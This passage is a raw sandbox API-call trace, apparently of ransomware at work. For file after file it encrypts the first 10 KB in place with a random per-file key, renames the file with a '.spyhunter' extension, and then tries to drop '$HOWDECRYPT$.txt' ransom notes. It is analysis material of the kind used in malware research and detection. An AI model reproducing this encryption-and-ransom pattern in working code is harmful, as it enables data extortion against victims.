Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned 74 [0146.141] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.141] GetProcessHeap () returned 0x2c0000 [0146.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0146.141] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ee1c*=0x2800, lpOverlapped=0x0) returned 1 [0146.145] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.145] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ee1c*=0x2800, lpOverlapped=0x0) returned 1 [0146.145] GetProcessHeap () returned 0x2c0000 [0146.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0146.145] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.145] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee1c, lpOverlapped=0x0 | out: lpBuffer=0x270ee5c*, lpNumberOfBytesWritten=0x270ee1c*=0x4, lpOverlapped=0x0) returned 1 [0146.146] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee1c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee1c*=0x30, lpOverlapped=0x0) returned 1 [0146.146] CloseHandle (hObject=0xa0) returned 1 [0146.147] GetProcessHeap () returned 0x2c0000 [0146.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.147] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.spyhunter") returned 84 [0146.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll.spyhunter")) returned 1 [0146.147] GetProcessHeap () returned 0x2c0000 [0146.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.147] GetProcessHeap () returned 0x2c0000 [0146.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0146.148] GetProcessHeap () returned 0x2c0000 [0146.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6408 | out: hHeap=0x2c0000) returned 1 [0146.148] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee58 | out: pbBuffer=0x270ee58) returned 1 [0146.148] GetProcessHeap () returned 0x2c0000 [0146.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0146.148] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee50*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee50*=0x30) returned 1 [0146.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0146.148] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned 73 [0146.148] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.149] GetProcessHeap () returned 0x2c0000 [0146.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0146.149] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ee14*=0x2800, lpOverlapped=0x0) returned 1 [0146.155] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.155] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ee14*=0x2800, lpOverlapped=0x0) returned 1 [0146.155] GetProcessHeap () returned 0x2c0000 [0146.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0146.155] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.156] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee14, lpOverlapped=0x0 | out: lpBuffer=0x270ee54*, lpNumberOfBytesWritten=0x270ee14*=0x4, lpOverlapped=0x0) returned 1 [0146.156] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee14, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee14*=0x30, lpOverlapped=0x0) returned 1 [0146.157] CloseHandle (hObject=0xa0) returned 1 [0146.157] GetProcessHeap () returned 0x2c0000 [0146.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.157] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.spyhunter") returned 83 [0146.157] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll.spyhunter")) returned 1 [0146.157] GetProcessHeap () returned 0x2c0000 [0146.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.158] GetProcessHeap () returned 0x2c0000 [0146.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0146.158] GetProcessHeap () returned 0x2c0000 [0146.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6328 | out: hHeap=0x2c0000) returned 1 [0146.158] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee58 | out: pbBuffer=0x270ee58) returned 1 [0146.158] GetProcessHeap () returned 0x2c0000 [0146.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0146.158] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee50*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee50*=0x30) returned 1 [0146.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0146.158] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned 77 [0146.159] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".txt") returned 0x0 [0146.159] GetProcessHeap () returned 0x2c0000 [0146.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0146.159] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ee14*=0x2800, lpOverlapped=0x0) returned 1 [0146.173] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.173] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ee14*=0x2800, lpOverlapped=0x0) returned 1 [0146.173] GetProcessHeap () returned 0x2c0000 [0146.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0146.173] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.173] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee14, lpOverlapped=0x0 | out: lpBuffer=0x270ee54*, lpNumberOfBytesWritten=0x270ee14*=0x4, lpOverlapped=0x0) returned 1 [0146.210] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee14, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee14*=0x30, lpOverlapped=0x0) returned 1 [0146.210] CloseHandle (hObject=0xa0) returned 1 [0146.210] GetProcessHeap () returned 0x2c0000 [0146.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.210] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.spyhunter") returned 87 [0146.210] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll.spyhunter")) returned 1 [0146.211] GetProcessHeap () returned 0x2c0000 [0146.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.211] GetProcessHeap () returned 0x2c0000 [0146.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0146.211] GetProcessHeap () returned 0x2c0000 [0146.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30b78 | out: hHeap=0x2c0000) returned 1 [0146.211] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee50 | out: pbBuffer=0x270ee50) returned 1 [0146.211] GetProcessHeap () returned 0x2c0000 [0146.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0146.211] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee48*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee48*=0x30) returned 1 [0146.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0146.212] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned 75 [0146.212] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.212] GetProcessHeap () returned 0x2c0000 [0146.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0146.212] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ee0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.386] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.386] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ee0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.386] GetProcessHeap () returned 0x2c0000 [0146.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0146.386] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.386] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee0c, lpOverlapped=0x0 | out: lpBuffer=0x270ee4c*, lpNumberOfBytesWritten=0x270ee0c*=0x4, lpOverlapped=0x0) returned 1 [0146.386] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee0c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee0c*=0x30, lpOverlapped=0x0) returned 1 [0146.386] CloseHandle (hObject=0xa0) returned 1 [0146.386] GetProcessHeap () returned 0x2c0000 [0146.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.386] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.spyhunter") returned 85 [0146.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll.spyhunter")) returned 1 [0146.387] GetProcessHeap () returned 0x2c0000 [0146.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.387] GetProcessHeap () returned 0x2c0000 [0146.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0146.387] GetProcessHeap () returned 0x2c0000 [0146.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6088 | out: hHeap=0x2c0000) returned 1 [0146.387] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee50 | out: pbBuffer=0x270ee50) returned 1 [0146.387] GetProcessHeap () returned 0x2c0000 [0146.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0146.387] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee48*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee48*=0x30) returned 1 [0146.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0146.388] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned 75 [0146.388] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.388] GetProcessHeap () returned 0x2c0000 [0146.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0146.388] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ee0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.442] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.442] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ee0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.443] GetProcessHeap () returned 0x2c0000 [0146.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0146.443] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.443] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee0c, lpOverlapped=0x0 | out: lpBuffer=0x270ee4c*, lpNumberOfBytesWritten=0x270ee0c*=0x4, lpOverlapped=0x0) returned 1 [0146.454] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee0c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee0c*=0x30, lpOverlapped=0x0) returned 1 [0146.454] CloseHandle (hObject=0xa0) returned 1 [0146.454] GetProcessHeap () returned 0x2c0000 [0146.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.454] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.spyhunter") returned 85 [0146.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll.spyhunter")) returned 1 [0146.455] GetProcessHeap () returned 0x2c0000 [0146.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.455] GetProcessHeap () returned 0x2c0000 [0146.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0146.455] GetProcessHeap () returned 0x2c0000 [0146.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5de8 | out: hHeap=0x2c0000) returned 1 [0146.455] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee48 | out: pbBuffer=0x270ee48) returned 1 [0146.455] GetProcessHeap () returned 0x2c0000 [0146.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0146.455] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee40*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee40*=0x30) returned 1 [0146.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0146.455] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") returned 76 [0146.456] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.456] GetProcessHeap () returned 0x2c0000 [0146.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0146.456] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ee04*=0x2800, lpOverlapped=0x0) returned 1 [0146.457] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.457] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ee04*=0x2800, lpOverlapped=0x0) returned 1 [0146.457] GetProcessHeap () returned 0x2c0000 [0146.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0146.457] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.457] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee04, lpOverlapped=0x0 | out: lpBuffer=0x270ee44*, lpNumberOfBytesWritten=0x270ee04*=0x4, lpOverlapped=0x0) returned 1 [0146.461] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee04, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee04*=0x30, lpOverlapped=0x0) returned 1 [0146.461] CloseHandle (hObject=0xa0) returned 1 [0146.461] GetProcessHeap () returned 0x2c0000 [0146.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.461] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.spyhunter") returned 86 [0146.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll.spyhunter")) returned 1 [0146.462] GetProcessHeap () returned 0x2c0000 [0146.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.462] GetProcessHeap () returned 0x2c0000 [0146.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0146.462] GetProcessHeap () returned 0x2c0000 [0146.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30438 | out: hHeap=0x2c0000) returned 1 [0146.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.462] GetProcessHeap () returned 0x2c0000 [0146.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffdbe8 | out: hHeap=0x2c0000) returned 1 [0146.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.462] GetProcessHeap () returned 0x2c0000 [0146.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feefc8 | out: hHeap=0x2c0000) returned 1 [0146.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.463] GetProcessHeap () returned 0x2c0000 [0146.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feeef0 | out: hHeap=0x2c0000) returned 1 [0146.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\netframework\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 